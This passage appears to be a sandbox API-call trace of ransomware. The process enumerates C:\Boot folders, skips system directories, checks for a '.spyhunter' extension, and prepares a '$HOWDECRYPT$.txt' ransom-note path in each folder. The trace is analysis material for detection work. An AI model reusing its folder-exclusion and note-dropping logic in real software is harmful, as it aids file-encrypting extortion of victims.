[0080.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.362] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.362] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.362] lstrlenW (lpString="Windows") returned 7 [0080.362] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.362] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.362] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.362] lstrlenW (lpString="System Volume Information") returned 25 [0080.362] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0080.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.362] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.362] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.362] lstrlenW (lpString="Windows") returned 7 [0080.362] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.362] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.362] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.362] lstrlenW (lpString="System Volume Information") returned 25 [0080.362] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0080.362] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.362] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.362] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.362] lstrlenW (lpString="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30dba8 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1a0) returned 0x30b778 [0080.363] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.363] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.363] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\$HOWDECRYPT$.txt") returned 34 [0080.363] lstrlenW (lpString="\\\\?\\C:\\Boot\\sv-SE\\$HOWDECRYPT$.txt") returned 34 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30dc38 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1a8) returned 0x30b778 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.363] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.363] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0080.363] lstrlenW (lpString="Windows") returned 7 [0080.363] lstrcmpiW (lpString1="tr-TR", lpString2="$Recycle.bin") returned 1 [0080.363] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.363] lstrcmpiW (lpString1="tr-TR", lpString2="System Volume Information") returned 1 [0080.363] lstrlenW (lpString="System Volume Information") returned 25 [0080.363] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0080.363] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0080.363] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0080.363] GetProcessHeap () returned 0x2c0000 [0080.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.363] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0080.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.364] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.364] lstrlenW (lpString="Windows") returned 7 [0080.364] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.364] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.364] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.364] lstrlenW (lpString="System Volume Information") returned 25 [0080.364] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0080.364] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.364] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.364] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.364] lstrlenW (lpString="Windows") returned 7 [0080.364] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.364] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.364] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.364] lstrlenW (lpString="System Volume Information") returned 25 [0080.364] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0080.364] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.364] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.364] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.365] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.365] lstrlenW (lpString="Windows") returned 7 [0080.365] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.365] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.365] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.365] lstrlenW (lpString="System Volume Information") returned 25 [0080.365] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0080.365] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.365] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.365] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.365] lstrlenW (lpString="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30dcc8 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1b0) returned 0x30b778 [0080.365] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.365] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.365] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\$HOWDECRYPT$.txt") returned 34 [0080.365] lstrlenW (lpString="\\\\?\\C:\\Boot\\tr-TR\\$HOWDECRYPT$.txt") returned 34 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30dd58 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1b8) returned 0x30b778 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.365] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.365] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0080.365] lstrlenW (lpString="Windows") returned 7 [0080.365] lstrcmpiW (lpString1="zh-CN", lpString2="$Recycle.bin") returned 1 [0080.365] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.365] lstrcmpiW (lpString1="zh-CN", lpString2="System Volume Information") returned 1 [0080.365] lstrlenW (lpString="System Volume Information") returned 25 [0080.365] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0080.365] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0080.365] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0080.365] GetProcessHeap () returned 0x2c0000 [0080.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.365] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0080.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.366] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.366] lstrlenW (lpString="Windows") returned 7 [0080.366] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.366] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.366] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.366] lstrlenW (lpString="System Volume Information") returned 25 [0080.366] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0080.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.366] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.366] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.366] lstrlenW (lpString="Windows") returned 7 [0080.366] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.366] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.366] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.366] lstrlenW (lpString="System Volume Information") returned 25 [0080.366] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0080.366] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.366] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.366] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.366] lstrlenW (lpString="Windows") returned 7 [0080.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.366] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.366] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.366] lstrlenW (lpString="System Volume Information") returned 25 [0080.366] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0080.366] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.366] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.366] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.366] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0080.366] GetProcessHeap () returned 0x2c0000 [0080.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30dde8 [0080.366] GetProcessHeap () returned 0x2c0000 [0080.366] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1c0) returned 0x30b778 [0080.367] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.367] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.367] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\$HOWDECRYPT$.txt") returned 34 [0080.367] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-CN\\$HOWDECRYPT$.txt") returned 34 [0080.367] GetProcessHeap () returned 0x2c0000 [0080.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30de78 [0080.367] GetProcessHeap () returned 0x2c0000 [0080.367] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1c8) returned 0x30b778 [0080.367] GetProcessHeap () returned 0x2c0000 [0080.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.367] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.367] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0080.367] lstrlenW (lpString="Windows") returned 7 [0080.367] lstrcmpiW (lpString1="zh-HK", lpString2="$Recycle.bin") returned 1 [0080.367] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.367] lstrcmpiW (lpString1="zh-HK", lpString2="System Volume Information") returned 1 [0080.367] lstrlenW (lpString="System Volume Information") returned 25 [0080.367] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0080.367] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0080.367] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0080.367] GetProcessHeap () returned 0x2c0000 [0080.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.367] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0080.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.368] lstrlenW (lpString="Windows") returned 7 [0080.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.368] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.368] lstrlenW (lpString="System Volume Information") returned 25 [0080.368] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0080.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.368] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.368] lstrlenW (lpString="Windows") returned 7 [0080.368] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.368] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.368] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.368] lstrlenW (lpString="System Volume Information") returned 25 [0080.368] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0080.368] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.368] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.368] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.369] lstrlenW (lpString="Windows") returned 7 [0080.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.369] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.369] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.369] lstrlenW (lpString="System Volume Information") returned 25 [0080.369] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0080.369] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.369] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.369] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.369] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30df08 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1d0) returned 0x30b778 [0080.369] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.369] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.369] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\$HOWDECRYPT$.txt") returned 34 [0080.369] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-HK\\$HOWDECRYPT$.txt") returned 34 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30df98 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1d8) returned 0x30b778 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.369] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.369] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0080.369] lstrlenW (lpString="Windows") returned 7 [0080.369] lstrcmpiW (lpString1="zh-TW", lpString2="$Recycle.bin") returned 1 [0080.369] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.369] lstrcmpiW (lpString1="zh-TW", lpString2="System Volume Information") returned 1 [0080.369] lstrlenW (lpString="System Volume Information") returned 25 [0080.369] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0080.369] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0080.369] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0080.369] GetProcessHeap () returned 0x2c0000 [0080.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.369] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0080.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.370] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.370] lstrlenW (lpString="Windows") returned 7 [0080.370] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.370] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.370] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.370] lstrlenW (lpString="System Volume Information") returned 25 [0080.370] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0080.370] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.370] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.370] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.370] lstrlenW (lpString="Windows") returned 7 [0080.370] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.370] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.370] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.370] lstrlenW (lpString="System Volume Information") returned 25 [0080.370] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0080.370] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.370] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.370] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.370] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.370] lstrlenW (lpString="Windows") returned 7 [0080.370] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.370] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.370] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.370] lstrlenW (lpString="System Volume Information") returned 25 [0080.370] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0080.370] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.370] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.370] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.370] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0080.370] GetProcessHeap () returned 0x2c0000 [0080.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30e028 [0080.370] GetProcessHeap () returned 0x2c0000 [0080.370] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1e0) returned 0x30b778 [0080.370] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.370] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.371] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\$HOWDECRYPT$.txt") returned 34 [0080.371] lstrlenW (lpString="\\\\?\\C:\\Boot\\zh-TW\\$HOWDECRYPT$.txt") returned 34 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30e0b8 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1e8) returned 0x30b778 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.371] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0 [0080.371] FindClose (in: hFindFile=0x2d84e8 | out: hFindFile=0x2d84e8) returned 1 [0080.371] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\$HOWDECRYPT$.txt") returned 28 [0080.371] lstrlenW (lpString="\\\\?\\C:\\Boot\\$HOWDECRYPT$.txt") returned 28 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7a) returned 0x30b600 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1f0) returned 0x30b778 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e9e90 | out: hHeap=0x2c0000) returned 1 [0080.371] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.371] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0080.371] lstrlenW (lpString="Windows") returned 7 [0080.371] lstrcmpiW (lpString1="bootmgr", lpString2="$Recycle.bin") returned 1 [0080.371] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.371] lstrcmpiW (lpString1="bootmgr", lpString2="System Volume Information") returned -1 [0080.371] lstrlenW (lpString="System Volume Information") returned 25 [0080.371] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0080.371] StrStrIW (lpFirst="bootmgr", lpSrch=".spyhunter") returned 0x0 [0080.371] lstrcmpW (lpString1="bootmgr", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.371] lstrcmpW (lpString1="bootmgr", lpString2="_uninstalling_.png") returned 1 [0080.371] lstrlenW (lpString="\\\\?\\C:\\bootmgr") returned 14 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x5e) returned 0x30c848 [0080.371] GetProcessHeap () returned 0x2c0000 [0080.371] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x1f8) returned 0x30b778 [0080.371] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.371] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0080.371] lstrlenW (lpString="Windows") returned 7 [0080.372] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$Recycle.bin") returned 1 [0080.372] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.372] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="System Volume Information") returned -1 [0080.372] lstrlenW (lpString="System Volume Information") returned 25 [0080.372] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0080.372] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".spyhunter") returned 0x0 [0080.372] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.372] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="_uninstalling_.png") returned 1 [0080.372] lstrlenW (lpString="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0080.372] GetProcessHeap () returned 0x2c0000 [0080.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x68) returned 0x30c940 [0080.372] GetProcessHeap () returned 0x2c0000 [0080.372] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b778, Size=0x200) returned 0x30b778 [0080.372] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0080.372] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows") returned -1 [0080.372] lstrlenW (lpString="Windows") returned 7 [0080.372] 